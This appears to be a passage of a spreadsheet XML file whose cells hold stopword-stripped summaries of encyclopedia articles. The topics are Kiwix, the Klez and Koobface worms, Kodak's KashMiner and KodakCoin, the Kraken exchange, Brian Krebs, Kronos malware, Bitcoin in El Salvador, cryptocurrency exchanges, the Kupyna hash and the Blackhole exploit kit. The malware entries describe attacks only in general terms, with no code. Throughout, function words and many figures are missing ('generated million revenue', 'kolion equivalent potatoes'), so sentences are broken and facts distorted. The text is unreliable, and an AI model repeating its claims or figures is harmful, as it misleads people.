raspberry software development project, kiwix directly involved deployment projects. however, third party organizations software component projects. examples include: universities libraries can't afford broadband internet access.the afripedia project kiwix servers french-speaking universities, internet access, african countries. schools developing countries, access internet difficult expensive.installed computers used laptop child project. installed raspberry schools easy access electricity tanzania tanzania development trust. installed tablets schools mali part malebooks project. used school teachers university professors, well students, senegal. deployed benin teacher training seminars zedaga, swiss specialized education. fondation orange used kiwix-serve french language technological knowledge product deployed africa. special version organization children's villages developed, initially developing countries, also used developed world. remote areas:aboard ships antarctic waters. senegalese navy patrol ships. included navigatrix, linux distribution people boats. train plane. european prison education programs. package managers stores kiwix available native package managers linux distributions. from 2014 2020, absent, xulrunner, program kiwix depended, deprecated mozilla removed package databases.kiwix available debian-based distros, ubuntu linux mint, sugar archlinux distributions. also available android. kiwix electron packages available native windows package manager winget. kiwix available microsoft store, google play, apple's store. also available installable html5 (kiwix form browser extensions firefox chromium (chrome, edge) progressive application (pwa), work offline. electron packages html5 compiled windows popular linux distributions. since 2015, series "customized apps" also released, medical wikipedia phet simulations largest. also goldendict supports file format since 2013, including offline (except android) ability create full-text indices. xowa internet-in-a-box references external links official website</t>
  </si>
  <si>
    <t>Klez</t>
  </si>
  <si>
    <t>klez computer worm propagates e-mail. first appeared october 2001. number variants worm exist. klez infects microsoft windows systems, exploiting vulnerability internet explorer's trident layout engine, used microsoft outlook outlook express render html mail. e-mail worm spreads always includes text portion attachments. text portion consists either html internal frame causes buggy e-mail clients automatically execute worm, lines text attempt induce recipient execute worm opening attachment (sometimes claiming attachment patch microsoft; sometimes claiming attachment antidote klez worm). first attachment always worm, whose internals vary. once worm executed, either automatically buggy html engine manually user, searches addresses send when sends out, attach file infected machine, leading possible privacy breaches. later variants worm would false from address, picking e-mail address random infected machine's outlook outlook express address book, making impossible casual observers determine machine infected, making difficult experts determine anything infected machine's internet service provider. also timeline computer viruses worms comparison computer viruses computer viruses external links anti-virus provider f-secure klez information anti-virus provider trend micro klez information anti-virus provider symantec klez information auscert external security bulletin, esb-2001.456, "malicious software report w32/klez", october 2001.</t>
  </si>
  <si>
    <t>Kodak KashMiner</t>
  </si>
  <si>
    <t>kodak kashminer bitcoin mining computer displayed kodak's booth consumer electronics show january 2018. promoted spotlite usa, previously licensed kodak name kodak-branded lighting. initiative endorsed eastman kodak.the plan up-front around $3,400, customers could rent kashminer apparently rebranded bitmain antminer years, keep bitcoins generated. devices would housed kodak's offices rochester, york, surplus power kodak's in-house power plant.the scheme widely criticized, branded "scam." brochure handed show promised $375 month payout every month years payout would impossible ever-rising bitcoin hash rate. kodak representative said stated rates "preliminary." "kodak" branding present miner tuesday january, thursday january "kodak" label removed replaced "spotlite digital assets" branding. news "tech tent" declared kodak kashminer (unrelated) kodakcoin plan "worst idea" 2018.in july 2018, spotlite halston mikail said u.s. securities exchange commission scheme. kodak stated kashminer never kodak-licensed product, miners installed headquarters. "kodak hashpower" website never finished, lorem ipsum placeholder text still present "terms conditions" "privacy policy" pages july. references external links kodakhashpower.com, archived june 2018, wayback machine decentral post bitmain antminer december 2018</t>
  </si>
  <si>
    <t>KodakCoin</t>
  </si>
  <si>
    <t>kodakcoin (stylized kodakcoin) photographer-oriented blockchain cryptocurrency planned payments licensing photographs; however, project failed shut down. cryptocurrency developed brand licensee agreement kodak ryde holding inc. (formerly wenn digital), relationship project cancelled. initial coin offering (ico) initially scheduled january 2018, indefinitely delayed questions vetting process. simple agreement future tokens (saft) scheduled 2018, limited purchases accredited investors.the website project shut down, mention kodakcoin kodakone removed kodak's website. background kodakcoin safts made available 2018 accredited investors united states, united kingdom, countries. working conjunction kodakone digital rights management platform, kodakcoin intended serve currency encrypted ledger intellectual property rights ownership. kodakcoin would used ethereum blockchain platform. kodakcoin created wenn digital, using kodak trademark license. kodakcoin rebranding abandoned initial coin offering (ico) known ryde, cryptocurrency developed wenn digital. wenn digital company formed investments wenn media group ryde gmbh, german company. wenn digital initial press release kodakone project published kodak january 2018 wenn digital described "live operational copyright infringement management system" delivering revenues photographers worldwide today" leveraging "the market position 30-year subsidiary wenn media, works approximately 2,500 professional photographers". german media reported march conversation wenn digital denecke, berlin-based startup ryde gmbh, according white paper released wenn digital (dated april 2018) builds technological core kodakone platform, "meanwhile majority-owned wenn digital". kodakone kodakcoin designed work kodak's kodakone platform, facilitate image licensing photographers. kodakone platform uses crawlers identify intellectual property licensed kodakone platform, payments licensed photographs made using kodakcoin cryptocurrency.the website project shutdown, mention kodakcoin kodakone removed kodak's website. reception following january announcement platform 2018 vegas, kodak's stock price tripled days, market valuation increased us$565 million, increase percent. january, third kodak's shares trading short.bbc news "tech tent" declared kodakcoin/kodakone (unrelated) kodak kashminer "worst idea" 2018. references external links official website</t>
  </si>
  <si>
    <t>Kolion</t>
  </si>
  <si>
    <t>kolion local currency created support farmers kolionovo, small town located south-east moscow. currency gained notoriety creator currency, mikhail shlyapnikov, arrested kolion declared illegal tender russia. history kolion created mikhail shlyapnikov 2014. kolion pegged kolion equivalent potatoes kolions pegged eggs. because farmers kolionovo received rubles twice year, kolion created alternative currency accepted kolionovo.in june 2015, shlyapnikov arrested kolion declared illegal. references russian farmer alters rural economy with virtual currency, moscow watches warily. thomas grove. wall street journal, april 2018 external links farm outside moscow gets chance life crypto zone rbth</t>
  </si>
  <si>
    <t>Koobface</t>
  </si>
  <si>
    <t>koobface network worm attacks microsoft windows, linux platforms. this worm originally targeted users networking websites like facebook, skype, yahoo messenger, email websites gmail, yahoo mail, mail. also targets networking websites, myspace, twitter, infect devices local network. technical support scammers also fraudulently claim intended victims koobface infection computer using fake popups using built-in windows programs. infection koobface ultimately attempts, upon successful infection, gather login information sites, facebook, skype, social media platforms, sensitive financial data well. uses compromised computers build peer-to-peer botnet. compromised computer contacts compromised computers receive commands peer-to-peer fashion. botnet used install additional pay-per-install malware compromised computer hijack search queries display advertisements. peer-to-peer topology also used show fake messages users purpose expanding botnet. first detected december 2008 potent version appeared march 2009. study information warfare monitor, joint collaboration secdev group citizen munk school global affairs university toronto, revealed operators scheme generated million revenue june 2009 june 2010.koobface originally spread delivering facebook messages people "friends" facebook user whose computer already infected. upon receipt, message directs recipients third-party website another koobface infected pc), prompted download purported update adobe flash player. download execute file, koobface infect system. commandeer computer's search engine direct contaminated websites. there also links third-party website facebook wall friend message came sometimes comments like youtube. link opened trojan virus infect computer become zombie host computer. among components downloaded koobface filter program blocks access well known security websites proxy tool enables attackers abuse infected time koobface gang also used limbo, password stealing program. several variants worm identified: worm:win32/koobface.gen!f net-worm.win32.koobface.a, attacks myspace net-worm.win32.koobface.b, attacks facebook worm_koobface.dc, attacks twitter w32/koobfa-gen, attacks facebook, myspace, hi5, bebo, friendster, myyearbook, tagged, netlog, badoo fubar w32.koobface.d osx/koobface.a, version spreads social networks facebook, myspace twitter.in january 2012, york times reported facebook planning share information koobface gang, name believed responsible. investigations german researcher droemer university alabama birmingham's center information assurance joint forensics research said helped uncover identities responsible. facebook finally revealed names suspects behind worm january 2012. they include stanislav avdeyko (leded), alexander koltyshev (floppy), anton korotchenko (krotreal), roman koturbach (pomuc), svyatoslav polichuck (psviat psycoman). they based petersburg, russia. group sometimes referred baba stanislav avdeyko leader. investigation also connected avdeyko coolwebsearch spyware. hoax warnings koobface threat also subject many hoax warnings designed trick social networking users spreading misinformation across internet. various anti-scam websites snopes.com thatsnonsense.com recorded many instances alarmist messages designed fool panic facebook users begun circulate prolifically using widely publicized koobface threat bait.other misconceptions spread regarding koobface threat, including false assertion accepting "hackers" facebook friends infect victim's computer koobface, facebook applications koobface threats. these claims untrue. other rumours assert koobface much dangerous examples malware ability delete computer files "burn hard disk." however, rumours inspired earlier fake virus warning hoaxes remain false. also computing trojan horse trojan.win32.dnschanger facebook malware malware analysis references external links koobface malware gang exposed!, research droemer dirk kollberg. real face koobface, analysis trend micro. researchers take down koobface servers, slashdot article.</t>
  </si>
  <si>
    <t>Kraken (company)</t>
  </si>
  <si>
    <t>kraken united states–based cryptocurrency exchange bank, founded 2011. first bitcoin exchanges listed bloomberg terminal reportedly valued billion usd, mid-summer 2022. history kraken co-founded 2011 jesse powell, alumni california state university, sacramento thanh luu. powell consultant resolving security issue, began working kraken replacement anticipating death; would indeed collapse 2014, failing security audits. september 2013, kraken launched, offering bitcoin, litecoin, euro trades initially going additional currencies margin trading. months earlier, kraken joined bitcoin players form "committee establishment digital asset transfer authority" self-regulatory group industry.in march 2014, kraken received million series investment hummingbird ventures bitcoin opportunity fund. month later, kraken became first bitcoin exchanges listed bloomberg terminal. year, kraken chosen assist investigation lost bitcoins gox; bankruptcy trustees relied upon kraken proven operating history without breached hackers. june 2015, kraken opened first dark pool bitcoins.in january 2016, kraken purchased coinsetter (and extension, cavirtex), exchange based york city. month later, kraken announced completion series round investment group acquired dutch exchange clevercoin, glidera, cryptocurrency wallet service. march 2017, kraken acquired cryptowatch, charting trading platform. december 2017, kraken claimed registering 50,000 users day.in april 2018, kraken announced closure services japan rising costs business. february 2019, kraken acquired crypto facilities, british derivatives trading firm. june 2019, kraken received $13.5 million 2,263 individual investors special-purpose vehicle. early 2021, kraken sought additional funding investors valuation billion, tribe capital becoming company's second largest institutional investor behind hummingbird ventures arjun sethi appointed board directors. january 2021, kraken released mobile international users, became available june 2021. june 2022, kraken reportedly valued billion usd. controversies identifying glassdoor reviewers 2019, kraken filed motion california's marin county superior court identify anonymous reviewers glassdoor. kraken suing them, allegedly breaching severance contract. electronic frontier foundation, represents anonymous reviewers, claims identifying reviewers would harm first amendment free-speech rights chill expression others. court since ordered glassdoor disclose real identity reviewers. government regulations april 2018, kraken refused compliance investigation york attorney general's office regarding measures taken cryptocurrency exchanges protect customers market manipulation money laundering, finding associated expenditure business. report went warn kraken might breaking law, suggested customers stay away referred platform york state department financial services potential violation local virtual currency regulations.in march 2019, exchange came investigated office foreign assets control potential violation sanction-regimes allowing trade customers based iran; july 2022, reports investigation final stages fine imposed. late september 2021, kraken ordered fine $1.25 million commodity futures trading commission offering unregistered margin trading. work culture 2019, powell suggested parenting distraction productive critiqued economic viability parental leaves; went broach whether choosing abide relevant governmental regulations risk worth taking. june 2022, powell urged employees work-meeting reject usage preferred gender pronouns; subsequently, opened slack channel "debate" people shall allowed choose gender neither race ethnicity. next day, kraken released "culture document" outlined "libertarian values" "core" kraken, obeyed work. among things, employees prohibited labelling others' comments "toxic, hateful, racist" etc., particular emphasis assigned "offensiveness" forbidden. powell fellow executives encouraged employees disagreed policy quit. also binance bitfinex coinbase references external links official website</t>
  </si>
  <si>
    <t>Kraken botnet</t>
  </si>
  <si>
    <t>kraken botnet network hacking spyware program attacks microsoft windows apple macintosh systems email world wide sites social networking sites. world's largest botnet april 2008.researchers kraken infected machines least fortune companies grew 400,000 bots. estimated send billion spam messages day. kraken botnet malware designed evade anti-virus software, employed techniques stymie conventional anti-virus software. also computer worm internet references external links fisher, dennis, kraken botnet balloons dangerous levels, searchsecurity.com, apr. 2008, retrieved 2008-04-07 orion, egan, there's botnet worm loose: kraken seeks sink fortune 500, inquirer, april 2008, retrieved 2008-04-07 neri, kraken botnet, botnet grande mundo, retrieved 2008-04-07, español. pierce, cody, amini, pedram, kraken botnet infiltration, 2008-04-28, retrieved 2008-04-28</t>
  </si>
  <si>
    <t>Krebs on Security</t>
  </si>
  <si>
    <t>brian krebs (born 1972) american journalist investigative reporter. best known coverage profit-seeking cybercriminals. krebs author daily blog, krebsonsecurity.com, covering computer security cybercrime. from 1995 2009, krebs reporter washington post covered tech policy, privacy computer security well authoring security blog. also known interviewing hacker 0x80. early life education born 1972 alabama, krebs earned b.a. international relations george mason university 1994. interest cybercriminals grew computer worm locked computer 2001. career 1999–2007 krebs started career washington post circulation department. from there, obtained copy aide post newsroom, split time sorting mail taking dictation reporters field. krebs also worked editorial aide editorial department financial desk. 1999, krebs went work staff writer newsbytes.com, technology newswire owned washington post.when post sold newsbytes 2002, krebs transitioned washingtonpost.com arlington, virginia full-time staff writer. krebs's stories appeared print edition paper washingtonpost.com. 2005, krebs launched security blog, daily blog centered around computer security, cyber crime tech policy. december 2009, krebs left washingtonpost.com launched krebsonsecurity.com. krebs focused reporting blog fallout activities several organized cybercrime groups operating eastern europe stolen tens millions dollars small mid-sized businesses online banking fraud. krebs written stories small businesses organizations victims online banking fraud, increasingly costly common form cybercrime. krebs wrote series investigative stories culminated disconnection dissolution several internet service providers experts said catered primarily cyber criminals. august 2008, series articles wrote washington post's security blog unplugging northern california based hosting provider known intercage atrivo.during time, krebs published two-part investigation illicit activity domain name registrar estdomains, atrivo's biggest customers, showing company's president, vladimir tšaštšin, recently convicted credit card fraud, document forgery money laundering. months later, internet corporation assigned names numbers (icann), entity charged overseeing domain registration industry, revoked estdomains' charter, noting tšaštšin's convictions violated icann policy prohibits officers registrar criminal record. november 2011, tšaštšin five would arrested estonian authorities charged running massive click fraud operation help changer trojan. 2008–2012 november 2008, krebs published investigative series disconnection mccolo, another northern california hosting firm experts said home control networks world's largest botnets. result krebs' reporting, mccolo's upstream internet providers disconnected mccolo rest internet, causing immediate sustained drop volume junk e-mail sent worldwide. estimates amount duration decline spam mccolo takedown vary, percent percent, weeks several months.krebs credited first journalist, 2010, report malware would later become known stuxnet. 2012, cited follow-up another breach credit debit card data, case potentially million visa mastercard accounts transactions handled global payments inc. atlanta, georgia. 2013–present march 2013, krebs became first journalists become victim swatting. december 2013, krebs broke story target corporation breached million credit cards. days later, krebs identified ukrainian krebs said behind primary black market site selling target customers' credit debit card information much us$100 apiece. 2014, krebs published book called spam nation: inside story organized cybercrime—from global epidemic your front door, went 2015 prose award.in 2016, krebs's blog target largest ever ddos attacks, apparently retaliation krebs's role investigating vdos botnet. akamai, hosting blog bono basis, quit hosting blog result attack, causing shut down. september 2016, google's project shield taken task protecting site, also pro-bono basis.an article krebs march 2018 krebsonsecurity.com mining software company script "coinhive" krebs published names admins german imageboard pr0gramm, former admin inventor script owner company, answered unusual protest action users imageboard. using "krebs" meaning "cancer" german, donated charitable organisations fighting diseases, collecting 200,000 euro (245,000 usd) donations evening march deutsche krebshilfe charity.prior 2021, investigation first american financial's prior data breach investigation concluding "ensuing company disclosures preceded executives’ knowledge unaddressed, months-old security reports." awards recognition 2004 carnegie mellon cylab cybersecurity journalism award merit 2005 cnet news.com listed security blogs, saying "good roundup significant security issues. washington post's brian krebs offers userful, first-person perspective". 2009 winner cisco systems' annual "cyber crime hero" award 2010 security bloggers network, "best non-technical security blog" 2010 sans institute cybersecurity journalist award 2011 security bloggers network, "blog that best represents industry" 2014 national press foundation, "chairman's citation award" 2017 issa's president’s award public service 2019 ciso mag’s cybersecurity person year media appearances krebs speaks computer security cybercrime topics. october 2011, gave keynote addresses govcert.nl rotterdam, secure 2011 warsaw, poland, sector 2011, toronto, ontario, canada, first 2011 vienna, austria. also mirai (malware) intuit#lawsuits 0x80 mspy russian business network blueleaks dark0de references external links official website aghast avast’s iyogi support cnet news.com "blog 100" review appearances c-span</t>
  </si>
  <si>
    <t>Kronos (malware)</t>
  </si>
  <si>
    <t>kronos type banking malware first reported 2014. sold $7,000.it developed followup upas released 2012.similar zeus, focused stealing banking login credentials browser sessions combination keylogging injection. 2015, attacks focused british banks.in august 2017, british security researcher marcus hutchins (aka 'malwaretech'), previously notable involvement stopping 2017 wannacry ransomware attack, arrested whilst visiting united states. alleged created software 2014, sold 2015 alphabay forums. hutchins later admitted paid work kronos predecessor upas (named toxic upas tree) main developer 2011 spring 2015. references</t>
  </si>
  <si>
    <t>Bitcoin in El Salvador</t>
  </si>
  <si>
    <t>salvador became first country world bitcoin legal tender, adopted legislative assembly salvador 2021. promoted nayib bukele, president salvador, claimed would improve economy making banking easier salvadorans, would encourage foreign investment. adoption criticized internationally within salvador, volatility bitcoin, environmental impact, lack transparency regarding government's fiscal policy. history background colón (svc) official currency salvador 1892 replaced dollar january 2001, legislative assembly salvador passed monetary integration administration former president francisco flores. authorized free circulation united states dollar salvador, removed colón circulation. purpose dollarizing salvador achieve financial stability encouraging foreign investment decreasing transaction costs international trade.however, government unable control monetary policy dollarization, value currency tied united states federal reserve. exchange rate, fixed dollar equivalent 8.75 colónes, decreased purchasing power population. dollarization slowed salvador's exports could compete undervalued currencies developing countries china. lack financial literacy harmed population salvador since know dollar understood value.remittances accounted 2020. they currently delivered money transmitters, operate in-person basis.in 2019, village zonte adopted bitcoin payment following donation $100,000 worth bitcoin anonymous donor. donation came stipulation village adopt circular economy based bitcoin. many residents zonte access banking services, accessed bitcoin mobile devices bitcoin atms commercial areas. village since become known "bitcoin beach", cited example using cryptocurrency legal tender advocates bitcoin. 2022, honduras guatemala also made attempts attract tourists bitcoin "bitcoin hubs." adoption june 2021 president salvador nayib bukele announced bill adopt bitcoin legal tender salvador, english-language video bitcoin conference 2021 miami. bukele claimed adoption bitcoin would make easier salvadorans living abroad send remittances relatives country. bitcoin would also make digital transactions accessible underbanked people.on june 2021, legislative assembly salvador voted adopt bitcoin law, would make cryptocurrency legal tender country, majority vote deputies favor. government announced aside $150 million cash back country's bitcoin. world bank rejected request government assist implementation transparency concerns environmental impact bitcoin mining. government announced would distribute us$30 bitcoin people sign electronic wallet called chivo (salvadorean slang 'cool'), cost million. chivo private enterprise, information regarding platform policies classified government. reaction adoption bitcoin legal tender salvador drew criticism internationally, within salvador. september thousands protestors gathered salvador protest launch chivo adoption bitcoin. cause protests concern lack transparency regarding creation bitcoin chivo, dollars purchase bitcoin. limited rate internet penetration salvador would also limit number people could make cryptocurrency.many international financial experts warned bitcoin's volatility would introduce unnecessary risk instability salvador's underdeveloped economy. july 2021, moody's investors service downgraded credit rating salvador, citing bukele's fiscal policies adoption bitcoin factor. following salvador's adoption bitcoin, panamanian congressman gabriel silva proposed similar bill would give "legal, regulatory, fiscal certainty use, holding issuance digital value crypto assets republic panama."some critics suggested bitcoin's anonymity would make easier engage money laundering criminal activities. particular, potential bitcoin evade taxes, transactions related transnational gangs human trafficking salvador noted.the international cryptocurrency community largely supportive law, believed could lead greater acceptance cryptocurrency states central banks. cryptocurrency advocates twitter instagram shared videos people using bitcoin make purchases chains like starbucks, pizza mcdonald's.in january 2022, international monetary fund urged salvador cease using bitcoin legal tender, citing risk country's financial stability, integrity consumer protection. advised continued bitcoin would make less likely institution would grant salvador previously discussed loan $1.3 billion.a poll centro estudios ciudadanos francisco gavidia university november 2021, found salvadorans preferred dollar bitcoin. january 2022, fortune reported switch bitcoin made paying remittances difficult many salvadorans, rather easier promised, fees associated bitcoin transactions several times expensive traditional remittances.a poll published central american university september 2021 found salvadorans clear understanding bitcoin was, 67.9% disagreed decision adopt legal tender. government salvador purchased ₿400, worth $20.9 million time, september bitcoin came effect. september 2021, bitcoin came effect bitcoin became legal tender salvador, making first country world part adoption, government began requiring businesses accept under law, transactions bitcoin subject capital gains tax, foreign bitcoin investors invest country eligible permanent residence. usage economic impact bitcoin salvador immediate impact 2021 chivo launched october 2021, immediately drew criticism issues regarding features like payment processing transactions. shortly midnight, bukele confirmed twitter available either apple store huawei, although latter later added chivo disabled hours launch allow platform increase capacity servers. system also plagued identity theft, resulted theft sign-on bonuses. shortly launch, chivo announced changing pricing features prevent scalping, complaints difficulty trading chivo pricing discrepancies.the majority users stopped using platform collected sign bonuses. according financial times, country's largest banks reported first week chivo's 0.0001% transactions bitcoin.in 2021, government salvador began purchasing bitcoin. spent $85.5 million bitcoin september 2021 january 2022. value bitcoin began decreasing november 2021, fallen value january 2022. estimated salvadoran national reserves lost million result this. government continued purchase bitcoins dip, holdings least ₿1,801 valued million january 2022.bukele announced government would sustainable geothermal energy bitcoin mining. bitcoin mining uses large amounts energy, contributes pollution fossil fuels used provide energy. bukele announced plans "bitcoin city" november 2021. city would built base conchagua volcano would circular, evoking shape coin. city's location would enable geothermal energy bitcoin mining. bukele additionally stated income taxes would collected city.el salvador's overseas bonds dropped. 2022, government began drafting legislature creation billion "volcano bonds". half bonds would used fund bukele's "bitcoin city", remaining half would used purchase bitcoin would five-year lock period. proposed bonds viewed skepticism international investors, although crythe announcement caused value salvador's overseas bonds decrease, falling december 2021. usage 2022 year adoption bitcoin, economic surveys found cryptocurrency widely used salvador, part lack digital literacy. study published national bureau economic research found people downloaded chivo sign-on bonus, chivo users stopped using spending bonus. despite governmental attempts make bitcoin acceptance universal, estimated business accepted payment bitcoin. salvadoran chamber commerce found businesses salvador conducted bitcoin transactions september 2021 july 2022, felt able bitcoin valuable. according central reserve bank, bitcoin used 1.9% remittance payments sent salvador september 2021 april 2022. media outlets reported bitcoin failed increase tourist revenue, even tourist hubs limited minority tourists. however, businesses zonte reported seen increase business cryptocurrency tourists.in march 2022, salvadoran government announced "volcano bonds" project postponed, citing global economic conditions ukraine factors.after 2021–2022 cryptocurrency crash, bitcoin lost value november 2021. time, bukele spent us$150 million, roughly salvador's national reserves, invest bitcoin. according bbc, 2,300 bitcoins purchased salvadoran government lost value. salvador's economic growth rate declined time, many economists predicted high chance defaulting debt. response issues, bukele decreased public funding, resulted reduction water infrastructure public services municipalities. bukele frequently responded volatility cryptocurrency market announcing twitter "buying dip." june 2022, bought additional bitcoins. salvadoran minister finance alejandro zelaya stated country lost money crash, sell bitcoins.prior crash, several countries announced plans adopt bitcoin legal tender, central african republic done also legality bitcoin country territory references</t>
  </si>
  <si>
    <t>Bitcoin futures</t>
  </si>
  <si>
    <t>Bitcoin exchange</t>
  </si>
  <si>
    <t>cryptocurrency exchange, digital currency exchange (dce), business allows customers trade cryptocurrencies digital currencies assets, conventional fiat money digital currencies. exchanges accept credit card payments, wire transfers forms payment exchange digital currencies cryptocurrencies. cryptocurrency exchange market maker typically takes bid–ask spreads transaction commission service matching platform, simply charges fees. some brokerages also focus assets stocks, like robinhood etoro, users purchase withdraw cryptocurrencies cryptocurrency wallets. dedicated cryptocurrency exchanges binance coinbase allow cryptocurrency withdrawals, however. operation exchanges send cryptocurrency user's personal cryptocurrency wallet. some convert digital currency balances anonymous prepaid cards used withdraw funds atms worldwide digital currencies backed real-world commodities gold.the creators digital currencies often independent digital currency exchange facilitate trading currency. type system, digital currency providers (dcp) businesses keep administer accounts customers, generally issue digital currency customers directly. customers sell digital currency digital currency exchanges, transfer digital currency customer's account. some exchanges subsidiaries dcp, many legally independent businesses. denomination funds kept accounts real fictitious currency.a digital currency exchange brick-and-mortar business strictly online business. brick-and-mortar business, exchanges traditional payment methods digital currencies. online business, exchanges electronically transferred money digital currencies.often, digital currency exchanges operate outside western countries avoid regulation prosecution. however, handle western fiat currencies maintain bank accounts several countries facilitate deposits various national currencies.decentralized exchanges etherdelta, idex hadax store users' funds exchange, instead facilitate peer-to-peer cryptocurrency trading. decentralized exchanges resistant security problems affect exchanges, 2018 suffer trading volumes. history early history 2004 three australian-based digital currency exchange businesses voluntarily shut following investigation australian securities investments commission (asic). asic viewed services offered legally requiring australian financial services license, companies lacked.in 2006, u.s.-based digital currency exchange business gold inc., york state business, shut u.s. secret service operating since 2002. business operators arthur budovsky vladimir kats indicted charges operating illegal digital currency exchange money transmittal business" apartments, transmitting million digital currency accounts. customers provided limited identity documentation, could transfer funds anyone worldwide, fees sometimes exceeding $100,000. budovsky kats sentenced 2007 five years prison "for engaging business transmitting money without license, felony violation state banking law", ultimately receiving sentences five years' probation.in april 2007, u.s. government ordered e-gold administration lock/block approximately e-gold accounts owned used bullion exchange, anygoldnow, icegold, gitgold, denver gold exchange, goldpouch express, 1mdc digital gold currency, based e-gold) others, forcing g&amp;sr (owner omnipay) liquidate seized assets. weeks later, e-gold faced four indictments.in july 2008, webmoney changed rules, affecting many exchanges. since time became prohibited exchange webmoney popular e-currencies like e-gold, liberty reserve others. also july 2008 e-gold's three directors accepted bargain prosecutors pleaded guilty count "conspiracy engage money laundering" count "operation unlicensed money transmitting business". e-gold ceased operations 2009. 2013, jean-loup richet, research fellow essec isis, surveyed money laundering techniques cybercriminals using report written united nations office drugs crime. common approach cyber money laundering digital currency exchanger service converted dollars liberty reserve could sent received anonymously. receiver could convert liberty reserve currency back cash small fee. 2013, digital currency exchanger liberty reserve shut alleged founder, arthur budovsky belanchuk, four others arrested costa rica, spain, york "under charges conspiracy commit money laundering conspiracy operation unlicensed money transmitting business." budovsky, former u.s. citizen naturalized costa rican, convicted connection 2006 gold raid. more million assets placed restraint pending forfeiture, liberty reserve exchanger domain names seized. company estimated laundered billion criminal proceeds. 2014 present following launch decentralized cryptocurrency bitcoin 2008 subsequent introduction cryptocurrencies, many virtual platforms created specifically exchange decentralized cryptocurrencies. their regulation differs country country. february 2014, gox, largest cryptocurrency exchange time, suspended trading, closed website exchange service, filed bankruptcy protection japan creditors. april 2014, company began liquidation proceedings. this result large theft bitcoins stolen straight wallet time, beginning late 2011.in december 2021 mycryptowallet exchange called liquidators. june 2022, securities exchange commission launched enquiry binance legal enquiry entity crypto products dealing examples early 2018, bloomberg news reported largest cryptocurrency exchanges based volume estimated revenues data collected coinmarketcap. similar statistics reported statista survey encrybit understand cryptocurrency exchange problems. according survey, three cryptocurrency exchanges binance, huobi, okex. other data points survey included problems cryptocurrency traders experience cryptocurrency exchanges expectation traders. security high trading fees concerns. exchanges fairly privately held. several report basic information names owners, financial data, even location business. binance bitfinex bithumb bitstamp coinbase huobi kraken okex upbit legislation 2016, several cryptocurrency exchanges operating european union obtained licenses payment services directive electronic money directive. adequacy licenses operation cryptocurrency exchange judicially tested. european council european parliament announced issue regulations impose stricter rules targeting exchange platforms. 2018, u.s. securities exchange commission maintained platform offers trading digital assets securities operates "exchange," defined federal securities laws, platform must register national securities exchange exempt registration". commodity futures trading commission permits trading cryptocurrency derivatives publicly.among asian countries, japan forthcoming regulations mandate need special license financial services authority operate cryptocurrency exchange. china korea remain hostile, china banning bitcoin miners freezing bank accounts. while australia announce conclusive regulations cryptocurrency, require citizens disclose digital assets capital gains tax. also digital gold currency list bitcoin companies list largest cryptocurrency exchanges foreign exchange market references further reading rash, wayne march 2018). "crypto-currency exchanges, coin offerings facing likely regulation". eweek. retrieved march 2018.</t>
  </si>
  <si>
    <t>Kupyna</t>
  </si>
  <si>
    <t>kupyna (ukrainian: купина) cryptographic hash function defined ukrainian national standard dstu 7564:2014. created replace obsolete gost hash function defined standard gost 34.11-95, similar streebog hash function standardized russia. addition hash function, standard also describes message authentication code generation using kupyna digest sizes 256, bits. description kupyna hash function uses davies–meyer compression function based even–mansour cipher. compression function consists fixed permutations, taken kalyna block cipher consist four operations: addroundconstant, subbytes, shiftbytes mixcolumns. round function uses four different s-boxes.the function return digest arbitrary length bits; function returns n-bit digest called kupyna-n. recommended digest lengths 256, bits. designers claim differential rebound attacks ineffective rounds compression function.kupyna ukrainian name polygonatum odoratum. examples kupyna hashes hash values empty string. kupyna-256("") cd5101d1ccdf0d1d1f4ada56e888cd724ca1a0838a3521e7131d4fb78d0f5eb6 kupyna-512("") 656b2f4cd71462388b64a37043ea55dbe445d452aecd46c3298343314ef04019 bcfa3f04265a9857f91be91fce197096187ceda78c9c1c021c294a0689198538 cryptographic hash functions, even small change message (with overwhelming probability) result hash differing original average, half output bits, avalanche effect. example, adding period sentence: kupyna-256("the quick brown jumps lazy dog") 996899f2d7422ceaf552475036b2dc120607eff538abf2b8dff471a98a4740c6 kupyna-256("the quick brown jumps lazy dog.") 88ea8ce988fe67eb83968cdc0f6f3ca693baa502612086c0dcec761a98e2fb1f cryptanalysis christoph dobraunig, maria eichlseder, florian mendel describe collision attack using rebound attack kupyna-256 reduced rounds time complexity kupyna-256 reduced rounds time complexity 2120, based rebound attacks grøstl.jian dong also describe collision attack kupyna-256 reduced rounds time complexity 2120, well pseudo-preimage attack 6-round kupyna-256 time memory complexities 2250 8-round kupyna-512 time memory complexities 2498. they note attacks threat security claims kupyna.onur duman published differential fault analysis kupyna used schemes. according paper, recovering byte state requires 2.21–2.42 faults. references</t>
  </si>
  <si>
    <t>Blackhole exploit kit</t>
  </si>
  <si>
    <t>blackhole exploit was, 2012, prevalent threat, threats detected sophos exploit kit. purpose deliver malicious payload victim's computer. according trend micro majority infections exploit done series high volume spam runs. incorporates tracking mechanisms people maintaining know considerable information victims arriving kit's landing page. information tracked includes victim's country, operating system, browser piece software victim's computer exploited. these details shown kit's user interface. history blackhole exploit released "malwox", underground russian hacking forum. made first appearance 2010.the supposedly russian creators names "hodlum" "paunch". reported october 2013 "paunch" arrested.dmitry "paunch" fedotov sentenced seven years russian penal colony april 2016. function customer licenses blackhole exploit authors specifies various options customize kit. potential victim loads compromised page opens malicious link spammed email. compromised page malicious link spammed email sends user blackhole exploit server's landing page. this landing page contains obfuscated javascript determines victim's computers loads exploits computer vulnerable sometimes java applet loads java trojan horse. exploit usable, exploit loads executes payload victim's computer informs blackhole exploit server exploit used load payload. defenses typical defensive posture advanced malware includes, minimum, following: ensuring browser, browser's plugins, operating system date. blackhole exploit targets vulnerabilities versions browsers firefox, google chrome, internet explorer safari well many popular plugins adobe flash, adobe acrobat java. running security utility good antivirus good host-based intrusion prevention system (hips). polymorphic code used generating variants blackhole exploit kit, antivirus signatures behind automated generation variants blackhole exploit kit, changing algorithm used load malware onto victims' computers takes effort developers exploit kit. good hips defend variants blackhole exploit previously known algorithms. also backdoor (computing) botnet computer virus exploit hacktool.win32.hackav mpack (software) spyware trojan horse (computing) darkcomet (trojan rat) references</t>
  </si>
  <si>
    <t>Jungle Disk</t>
  </si>
  <si>
